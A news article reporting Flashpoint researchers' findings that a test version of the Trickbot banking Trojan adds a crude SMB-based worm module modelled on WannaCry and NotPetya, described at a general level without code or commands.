Hackers responsible for one of the most common forms of banking Trojans have learned lessons from the global WannaCry ransomware outbreak and the Petya cyberattack, and have equipped their malware with a worm propagation module to help it spread more efficiently.
The credential-stealing Trickbot has been hitting the financial sector since last year and more recently it has added a long list of UK and US banks to its targets. The attacks are few in number but highly targeted. The malware is spread via emails that claim to be from an international financial institution, which then lead the victim to a fake login page used to steal credentials.
Now the gang behind Trickbot are testing additional techniques with a new version of the malware — known as 1000029 — and researchers at Flashpoint who’ve been watching it say it can spread via Server Message block (SMB), crudely replicating the exploit that allowed WannaCry and Petya to quickly spread around the world.
A Windows security flaw known as EternalBlue was one of many allegedly known to US intelligence services and used to carry out surveillance before being leaked by the Shadow Brokers hacking group. The exploit leverages a version of Windows’ Server Message Block (SMB) networking protocol to spread itself across an infected network using wormlike capabilities.
Using SMB, Trickbot can now scan domains for lists of servers via the NetServerEnum Windows API and establish the number of computers on the network using Lightweight Directory Access Protocol (LDAP) enumeration.
The malware can also leverage inter-process communication to propagate and execute a PowerShell script as a final payload in order to download an additional version of Trickbot — this time masked as ‘setup.exe’ into the shared drive.
Crucially, this test version of Trickbot doesn’t appear to be fully implemented by the hacking gang behind the malware, nor does it have the ability to randomly scan external IPs for SMB connections, unlike the worm behind the WannaCry ransomware.
Nonetheless, researchers warn that this development once again demonstrates the evolving, professional work of the cybercrime gang behind Trickbot as they examine further ways to steal financial data from banks and private wealth management firms.
Ultimately, if successfully deployed, the worm could allow Trickbot to infect other computers on the same network as the machine initially compromised by a phishing email, either for the further stealing of credentials and further account take over, or even to rope them into a botnet for further spread of malware.
“Even though the worm module appears to be rather crude in its present state, it is evident that the Trickbot gang learned from the global ransomware worm-like outbreaks of WannaCry and NotPetya and is attempting to replicate their methodology,” said Vitali Kremez, director of Research at Flashpoint.
While Trickbot isn’t as prolific as the likes of Zeus, Gozi, Ramnit, and Dridex, researchers warn that Trickbot will continue to be “formidable force” in future, as its authors look to add more potent capabilities to this dangerous malware.